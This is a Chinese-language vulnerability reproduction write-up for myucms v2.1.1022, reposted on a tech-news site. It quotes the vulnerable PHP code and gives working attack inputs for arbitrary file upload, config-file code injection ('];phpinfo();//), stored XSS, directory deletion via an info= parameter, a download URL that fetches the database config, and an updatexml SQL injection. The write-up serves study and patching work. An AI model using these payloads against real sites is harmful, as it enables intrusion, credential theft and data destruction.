iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >复现myucms v2.1.1022漏洞
  • 449
分享到

复现myucms v2.1.1022漏洞

php漏洞复现渗透测试 2023-09-17 10:09:08 449人浏览 泡泡鱼
摘要

漏洞列表 漏洞类型复现任意文件上传√配置文件覆盖√任意文件上传2√跨站脚本漏洞√任意文件删除√任意文件下载√sql注入√ 复现漏洞 任意文件上传1 漏洞成因 展示位置: 代码位置: myucms-v

漏洞列表

漏洞类型复现
任意文件上传
配置文件覆盖
任意文件上传2
跨站脚本漏洞
任意文件删除
任意文件下载
sql注入

复现漏洞

任意文件上传1

漏洞成因

展示位置:
在这里插入图片描述
代码位置:
myucms-v2.1.1022\application\admin\controller\Upload.PHP

public function upfile(){    if (!session('userid') || !session('username')) {        $this->error('亲!请登录',url('bbs/login/index'));    } else {    return JSON($this->model->upfile('files'));    }}

这里会判断是否登录,没有登录会跳转到登录界面,登录则会调用model->upfile

public function upfile($type,$filename = 'file',$is_water = false){    if (config('WEB.qiniuopen') == 1) {        $driverConfig = array('secrecTKEy' => config('web.secrectKey'), 'accessKey' => config('web.accessKey'), 'domain' => config('web.domain'), 'bucket' => config('web.bucket'));        $setting = array('rootPath' => './', 'saveName' => array('uniqid', ''), 'hash' => true);        $setting['exts'] = explode(',', config('web.WEB_RXT'));        $setting['maxSize'] = 50 * 1024 * 1024;        $File = $_FILES['file'];        $Upload = new Upload($setting, 'Qiniu', $driverConfig);        $info = $Upload->uploadOne($File);        if ($info) {            $data['sha1'] = $info['sha1'];            $data['md5'] = $info['md5'];            $data['create_time'] = time();            $data['uid'] = session('userid');            $data['download'] = 0;            $data['size'] = $info['size'];            $data['name'] = $info['name'];            $data['ext'] = $info['ext'];            $data['savepath'] = $info['url'];            $data['savename'] = $info['savename'];            $data['mime'] = $info['type'];            $map['md5'] = $info['md5'];            $mmn = Db::name('file')->where($map)->find();            if (empty($mmn)) {                Db::name('file')->insert($data);                $res = Db::name('file')->getLastInsID();                if ($res > 0) {                    return array('code' => 200, 'msg' => '上传成功', 'hasscore' => 0, 'ext' => $data['ext'], 'id' => $res, 'headpath' => $data['savepath'],'path' => $data['savepath'], 'md5' => $data['md5'], 'savename' => $data['savename'], 'filename' => $data['name'], 'info' => $info);                } else {                    return array('code' => 0, 'msg' => '上传失败');                }            } else {                return array('code' => 200, 'msg' => '上传成功', 'hasscore' => 1, 'ext' => $mmn['ext'], 'id' => $mmn['id'], 'headpath' => $data['savepath'],'path' => $mmn['savepath'], 'md5' => $mmn['md5'], 'savename' => $mmn['savename'], 'filename' => $mmn['name'], 'info' => $mmn);            }        } else {            return array('code' => 0, 'msg' => $Upload->getError());        } } else {$file = request()->file($filename);    $md5 = $file->hash('md5');        $n = Db::name('file')->where('md5', $md5)->find();        if (empty($n)) {            $info = $file->validate(['size' => 50 * 1024 * 1024, 'ext' => config('web.WEB_RXT')])->move(ROOT_PATH . DS . 'uploads');            if ($info) {                $path = DS . 'uploads' . DS . $info->getSaveName();                $path = str_replace("\\", "/", $path);                $realpath = WEB_URL . $path;                $data['sha1'] = $info->sha1();                $data['md5'] = $info->md5();                $data['create_time'] = time();                $data['uid'] = session('userid');                $data['download'] = 0;                $data['size'] = $info->getSize();                $fileinfo = $info->getInfo();                $data['name'] = $fileinfo['name'];                $data['ext'] = $info->getExtension();                $data['savepath'] = $path;                $data['savename'] = $info->getFilename();                $data['mime'] = $fileinfo['type'];                Db::name('file')->insert($data);                $res = Db::name('file')->getLastInsID();  if ($res > 0) {                    return array('code' => 200, 'msg' => '上传成功', 'hasscore' => 0, 'ext' => $data['ext'], 'id' => $res, 'path' => $path, 'headpath' => $realpath, 'md5' => $data['md5'], 'savename' => $data['savename'], 'filename' => $data['name'], 'info' => $info->getInfo());                } else {                    return array('code' => 0, 'msg' => '上传失败');                }            } else {                return array('code' => 0, 'msg' => $file->getError());            }        } else {            $path = $n['savepath'];            $realpath = WEB_URL . $path;            return array('code' => 200, 'msg' => '上传成功', 'hasscore' => 1, 'ext' => $n['ext'], 'id' => $n['id'], 'path' => $path, 'headpath' => $realpath, 'md5' => $n['md5'], 'savename' => $n['savename'], 'filename' => $n['name'], 'info' => $n);                  }    }}

由于默认配置config(‘web.qiniuopen’)等于零(myucms-v2.1.1022\application\extra\web.php),所以进入else

 return ['WEB_GL'=>'0','WEB_KEJIAN'=>'0','WEB_KEJIANS'=>'0','WEB_INDEX'=>'bbs','WEB_BBS'=>'1','WEB_SHOP'=>'1','WEB_REG'=>'1','WEB_STA'=>'1','WEB_TAG'=>'插件,建议,模板,签到,反馈','WEB_TPT'=>'default','WEB_SHOPS'=>'default','WEB_URL'=>'','WEB_OPE'=>'1','WEB_BUG'=>'true','WEB_RXT'=>'rar,png,zip,jpg,gif,ico','ex'=>'extend/','addons'=>'请在官方下载正版','or'=>'org/','up'=>'Upload/','WEB_OPENS'=>'0','dr'=>'Driver/','do'=>'Dow.php','WEB_DES'=>'','secrectKey'=>'0','accessKey'=>'0','domain'=>'0','bucket'=>'0','qiniuopen'=>'0','Cascade'=>'1',]; 

使用request()->file($filename)获取文件

$file = request()->file($filename);

跟进,此处会处理上传文件获取全部内容

public function file($name = ''){    if (empty($this->file)) {        $this->file = isset($_FILES) ? $_FILES : [];    }    if (is_array($name)) {        return $this->file = array_merge($this->file, $name);    }    $files = $this->file;    if (!empty($files)) {        // 处理上传文件        $array = [];        foreach ($files as $key => $file) {            if (is_array($file['name'])) {                $item  = [];                $keys  = array_keys($file);                $count = count($file['name']);                for ($i = 0; $i < $count; $i++) {                    if (empty($file['tmp_name'][$i]) || !is_file($file['tmp_name'][$i])) {                        continue;                    }                    $temp['key'] = $key;                    foreach ($keys as $_key) {                        $temp[$_key] = $file[$_key][$i];                    }                    $item[] = (new File($temp['tmp_name']))->setUploadInfo($temp);                }                $array[$key] = $item;            } else {                if ($file instanceof File) {                    $array[$key] = $file;                } else {                    if (empty($file['tmp_name']) || !is_file($file['tmp_name'])) {                        continue;                    }                    $array[$key] = (new File($file['tmp_name']))->setUploadInfo($file);                }            }        }        if (strpos($name, '.')) {            list($name, $sub) = explode('.', $name);        }        if ('' === $name) {            // 获取全部文件            return $array;        } elseif (isset($sub) && isset($array[$name][$sub])) {            return $array[$name][$sub];        } elseif (isset($array[$name])) {            return $array[$name];        }    }    return;}

使用$file->hash(‘md5’)生成md5值,执行Db::name(‘file’)->where(‘md5’, $md5)->find()查询file表中是否有这个md5的值,有的话就会返回保存的路径

$path = $n['savepath'];$realpath = WEB_URL . $path;return array('code' => 200, 'msg' => '上传成功', 'hasscore' => 1, 'ext' => $n['ext'], 'id' => $n['id'], 'path' => $path, 'headpath' => $realpath, 'md5' => $n['md5'], 'savename' => $n['savename'], 'filename' => $n['name'], 'info' => $n);

没有的话会判断上传的类型

$info = $file->validate(['size' => 50 * 1024 * 1024, 'ext' => config('web.WEB_RXT')])->move(ROOT_PATH . DS . 'uploads');

位置:myucms-v2.1.1022\application\extra\web.php

类型:‘rar,png,zip,jpg,gif,ico’

由于config(‘web.WEB_RXT’)的参数值可以添加,位置:myucms-v2.1.1022\application\admin\controller\conf.php

public function add(){   $path = 'application/extra/web.php';   $file = include $path;         $config = array(     'WEB_RXT' => input('WEB_RXT'),     'WEB_GL' => input('WEB_GL'), 'WEB_REG' => input('WEB_REG'), 'WEB_TAG' => input('WEB_TAG'), 'WEB_OPE' => input('WEB_OPE'),     'WEB_BUG' => input('WEB_BUG'),     'WEB_BBS' => input('WEB_BBS'),     'WEB_SHOP' => input('WEB_SHOP'),     'WEB_INDEX' => input('WEB_INDEX'),     'WEB_KEJIAN' => input('WEB_KEJIAN'),     'WEB_KEJIANS' => input('WEB_KEJIANS'),     'Cascade' => input('Cascade'),     //七牛     'bucket' => input('bucket'),     'accessKey' => input('accessKey'),     'secrectKey' => input('secrectKey'),     'domain' => input('domain'),     'qiniuopen' => input('qiniuopen'),   );    $res = array_merge($file, $config);    $str = ';    foreach ($res as $key => $value) {        $str .= '\'' . $key . '\'' . '=>' . '\'' . $value . '\'' . ',';    }    $str .= ']; ';    if (file_put_contents($path, $str)) {        return json(array('code' => 200, 'msg' => '修改成功'));    } else {        return json(array('code' => 0, 'msg' => '修改失败'));    }}

复现漏洞

虽然使用了白名单进行过滤,但是可以白名单可以被控制从而导致可以上传任意文件
在这里插入图片描述
上传成功拼接路径:url+返回的路径
在这里插入图片描述

代码注入漏洞

漏洞成因

此处包含application/extra/web.php文件而且没有进行过滤,可以输出任意的内容到web.php

public function add(){   $path = 'application/extra/web.php';   $file = include $path;         $config = array(     'WEB_RXT' => input('WEB_RXT'),     'WEB_GL' => input('WEB_GL'), 'WEB_REG' => input('WEB_REG'), 'WEB_TAG' => input('WEB_TAG'), 'WEB_OPE' => input('WEB_OPE'),     'WEB_BUG' => input('WEB_BUG'),     'WEB_BBS' => input('WEB_BBS'),     'WEB_SHOP' => input('WEB_SHOP'),     'WEB_INDEX' => input('WEB_INDEX'),     'WEB_KEJIAN' => input('WEB_KEJIAN'),     'WEB_KEJIANS' => input('WEB_KEJIANS'),     'Cascade' => input('Cascade'),     //七牛     'bucket' => input('bucket'),     'accessKey' => input('accessKey'),     'secrectKey' => input('secrectKey'),     'domain' => input('domain'),     'qiniuopen' => input('qiniuopen'),   );    $res = array_merge($file, $config);    $str = ';    foreach ($res as $key => $value) {        $str .= '\'' . $key . '\'' . '=>' . '\'' . $value . '\'' . ',';    }    $str .= ']; ';    if (file_put_contents($path, $str)) {        return json(array('code' => 200, 'msg' => '修改成功'));    } else {        return json(array('code' => 0, 'msg' => '修改失败'));    }}

写入代码

'];phpinfo();//

复现漏洞

其他几处地址也存在这个问题,如:qq.php等

任意文件上传2

漏洞成因

位置:myucms-v2.1.1022\application\admin\model\Shops.php
使用request()->file(‘FileName’)获取文件,直接进行移动并没有进行过滤和鉴权

public function doUploadPic(){    $file = request()->file('FileName');    $info = $file->move(ROOT_PATH . DS . 'uploads');if($info){$path = WEB_URL . DS . 'uploads' . DS .$info->getSaveName();echo str_replace("\\","/",$path);    }}

move方法:

public function move($path, $savename = true, $replace = true){    // 文件上传失败,捕获错误代码    if (!empty($this->info['error'])) {        $this->error($this->info['error']);        return false;    }    // 检测合法性    if (!$this->isValid()) {        $this->error = 'upload illegal files';        return false;    }    // 验证上传    if (!$this->check()) {        return false;    }    $path = rtrim($path, DS) . DS;    // 文件保存命名规则    $saveName = $this->buildSaveName($savename);    $filename = $path . $saveName;    // 检测目录    if (false === $this->checkPath(dirname($filename))) {        return false;    }    // 不覆盖同名文件    if (!$replace && is_file($filename)) {        $this->error = ['has the same filename: {:filename}', ['filename' => $filename]];        return false;    }        if ($this->isTest) {        rename($this->filename, $filename);    } elseif (!move_uploaded_file($this->filename, $filename)) {        $this->error = 'upload write error';        return false;    }    // 返回 File 对象实例    $file = new self($filename);    $file->setSaveName($saveName)->setUploadInfo($this->info);    return $file;}

漏洞复现

很多功能点的上传功能都使用doUploadPic同时也都存在安全问题
如:商城管理->商品管理->添加商品
在这里插入图片描述
上传成功
在这里插入图片描述
拼接请求
在这里插入图片描述

跨站脚本漏洞

漏洞成因

根据id直接更新内容到数据库中,没有进行过滤和其他限制的操作
在这里插入图片描述

public function doedit()    {        $id = input('id');       $data = $this->request->post();       $data['time'] = time();       if(Db::name('set')->where('id',$id)->data($data)->update($data)){         $this->success('更新成功');       } else {           $this->error('更新失败');        }     }

{:myucms(‘tongji’)}

漏洞复现

位置:系统管理->网站配置->统计代码
在这里插入图片描述
触发点位置:Http://192.168.17.138/myucms-v2.1.1022/
在这里插入图片描述

任意文件删除

漏洞成因

使用$_GET[‘info’]获取文件路径拼接后传入到deleteun方法里

public function un(){ $info = $_GET['info'];    $res=deleteun(ROOT_PATH.'addons'.DS.$info);       if ($res) {        return json(array('code' => 200, 'msg' => '删除成功'));    }else{        return json(array('code' => 0, 'msg' => '删除失败'));    }}

deleteun():循环删除目录的文件的函数

function deleteun($dir_name){    $result = false;    if (is_dir($dir_name)) {        if ($handle = opendir($dir_name)) {            while (false !== ($item = readdir($handle))) {                if ($item != '.' && $item != '..') {                    if (is_dir($dir_name . DS . $item)) {                        deleteun($dir_name . DS . $item);                    } else {                        unlink($dir_name . DS . $item);                    }                }            }            closedir($handle);            if (rmdir($dir_name)) {                $result = true;            }        }    }    return $result;}

测试下删除myucms-v2.1.1022\addons\1目录

漏洞复现

  • 位置1:/admin.php/addons/un.html?info=1
    默认删除位置:\myucms-v2.1.1022\addons

  • 位置2:/admin.php/muban/un.html?info=1
    默认删除位置:\myucms-v2.1.1022\application\bbs\view

在这里插入图片描述

任意文件下载1

漏洞成因

传入url、name、local的值,当local等于1会调用$down->download传入url和name

public function download($url, $name, $local){    $down = new Http();    if ($local == 1) {        $down->download($url, $name);    } else {    }}

跟进$down->download并没有限制,只要文件存在即可下载

static public function download ($filename, $showname='',$content='',$expire=180) {if(is_file($filename)) {$length = filesize($filename);}elseif($content != '') {$length = strlen($content);}else {throw_exception($filename.L('下载文件不存在!'));}if(empty($showname)) {$showname = $filename;}$showname = basename($showname);if(!empty($filename)) {$type = mime_content_type($filename);}else{$type = "application/octet-stream";}//发送Http Header信息 开始下载header("Pragma: public");header("Cache-control: max-age=".$expire);//header('Cache-Control: no-store, no-cache, must-revalidate');header("Expires: " . gmdate("D, d M Y H:i:s",time()+$expire) . "GMT");header("Last-Modified: " . gmdate("D, d M Y H:i:s",time()) . "GMT");header("Content-Disposition: attachment; filename=".$showname);header("Content-Length: ".$length);header("Content-type: ".$type);header('Content-Encoding: none');header("Content-Transfer-Encoding: binary" );if($content == '' ) {readfile($filename);}else {echo($content);}exit();}

漏洞复现

拼接url请求

/myucms-v2.1.1022/index.php/bbs/index/download?url=application/database.php&local=1&name

下载成功
在这里插入图片描述

sql注入

漏洞成因

位置:application/bbs/controller/User.php/xiaoxidel
此处会判断当前登录状态,登录后才会进入漏洞触发位置

public function xiaoxidel($ids)    {        if (!session('userid') || !session('username')) {            $this->error('亲!请登录',url('bbs/login/index'));        } else {        if ($ids==0) {        $id = input('id');        $data['open'] = 1;if (Db::name('xiaoxi')->where("id = {$id}")->where('userid', session('userid'))->update($data)) {return json(array('code' => 200, 'msg' => '标记已读成功'));} else {return json(array('code' => 0, 'msg' => '标记已读失败'));}        }elseif ($ids==1){        $id = input('id');if (Db::name('xiaoxi')->where("id = {$id}")->where('userid', session('userid'))->delete($id)) {return json(array('code' => 200, 'msg' => '彻底删除成功'));} else {return json(array('code' => 0, 'msg' => '彻底删除失败'));}        }        }    }

根据查询的语句得知传入id和userid,这里只需要id即可

Db::name('xiaoxi')->where("id = {$id}")->where('userid', session('userid'))->update($data)

拼接请求/index.php/bbs/user/xiaoxidel/ids/0/id/1
在这里插入图片描述
这里会更新id为1的消息阅读状态

漏洞复现

报错注入:and updatexml(1,concat(0x7e,user(),0x7e),1)

在这里插入图片描述
执行可以看到当前用户为root

/index.php/bbs/user/xiaoxidel/ids/0/id/1and updatexml(1,concat(0x7e,user(),0x7e),1)

在这里插入图片描述

来源地址:https://blog.csdn.net/p_utao/article/details/126277844

--结束END--

本文标题: 复现myucms v2.1.1022漏洞

本文链接: https://www.lsjlt.com/news/410941.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 复现myucms v2.1.1022漏洞
    漏洞列表 漏洞类型复现任意文件上传√配置文件覆盖√任意文件上传2√跨站脚本漏洞√任意文件删除√任意文件下载√sql注入√ 复现漏洞 任意文件上传1 漏洞成因 展示位置: 代码位置: myucms-v...
    99+
    2023-09-17
    php 漏洞复现 渗透测试
  • XSS漏洞总结和漏洞复现
    XSS漏洞总结和漏洞复现 XSS漏洞概述:类型一:反射型类型二:存储型类型三:DOM型 复现20字符短域名绕过一、安装BEEFhttps://blog.csdn.net/weixin_45...
    99+
    2023-09-28
    xss php 前端
  • CSRF漏洞复现
    目录标题 原理如何实现和xss区别危害CSRF实战(pikachu)dvwa靶场 CSRF(Cross Site Request Forgery)。跨站请求伪造 原理 攻击者会伪造一...
    99+
    2023-09-06
    csrf php 服务器
  • Apache漏洞复现
    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability)漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715)漏洞防御 ...
    99+
    2023-09-01
    apache php 开发语言
  • Nginx漏洞复现
    前言https://blog.csdn.net/weixin_58163202/article/details/ Nginx 是一款轻量级的 Web 服务器、反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个 BSD-li...
    99+
    2023-09-22
    nginx 前端 安全 Powered by 金山文档
  • phpStudy poc漏洞复现以及漏洞修复办法
    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响...
    99+
    2023-06-03
  • [漏洞复现]Thinkphp RCE
    文章目录 简介影响版本复现文件包含目录穿越 修复 简介 Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参...
    99+
    2023-09-16
    php
  • vulhub-thinkphp漏洞复现
    vulhub-thinkphp漏洞复现 https://silentx.gitee.io/2022/09/06/thinkphp/ 一.ThinkPHP 2.x 任意代码执行漏洞 1.概述 漏洞...
    99+
    2023-09-21
    网络安全 php
  • Nginx解析漏洞复现
    1、漏洞描述 版本信息: Nginx 1.x 最新版PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 2、漏洞原理 由于nginx.conf的如下配置导致nginx把以’.php’结尾的...
    99+
    2023-09-27
    安全
  • Nginx 解析漏洞复现
    漏洞描述 产生原因 环境搭建 漏洞复现 漏洞描述 Nginx (engine x) 是一个高性能的HTTP和反向代理WEB服务器,同时也提供了IMAP/POP3/SMTP服务。 Nginx是一款轻量...
    99+
    2023-10-12
    nginx php 服务器 web安全
  • CVE-2022-30887漏洞复现
    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CM...
    99+
    2023-09-11
    php 开发语言 安全 网络 服务器
  • ecshop漏洞复现分析
    ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-8...
    99+
    2023-09-12
    php 安全 数据库
  • 漏洞复现 || eGroupWare spellchecker.php 远程命令执行漏洞
    0x01 阅读须知 我爱林的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统...
    99+
    2023-09-07
    php 开发语言 漏洞复现 网络安全 安全
  • Phpstudy后门漏洞复现
    一、漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连...
    99+
    2023-09-05
    安全 php 开发语言 web安全
  • Nacos漏洞总结复现
     Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos {Hostname}}{Hostname}} User-Agent: Moz...
    99+
    2023-10-08
    安全 web安全 网络 java 开发语言
  • 通达oa漏洞复现 
    通达OAget_contactlist.php敏感信息泄露漏洞复现 漏洞描述 通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综...
    99+
    2023-09-16
    安全性测试 威胁分析 Powered by 金山文档
  • CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
    文章目录 CVE-2023-28432 MinIO 信息泄露漏洞1. MinIO简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见 CVE-2023-28432 MinIO 信息泄露漏...
    99+
    2023-08-18
    网络 服务器 安全 web安全
  • Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述02 影响范围03 验证方式04 利用方式05 修复方案 01 漏洞描述 Thinkphp是一个国内轻量级的开发框架...
    99+
    2023-09-12
    安全 php web安全
  • Pfsense漏洞复现(CVE-2021-41282)
    一、产品介绍: pfSense® Plus 软件是世界上最值得信赖的防火墙。 该软件赢得了全球用户的尊重和喜爱——安装次数超过 300 万次。 开源技术使之成为可能。 由 Netgate 制成坚固、可靠、可靠的产品 产品官网: https:...
    99+
    2023-09-07
    安全 php web安全 网络安全
  • 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
    漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA...
    99+
    2023-08-21
    java sql 开发语言
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作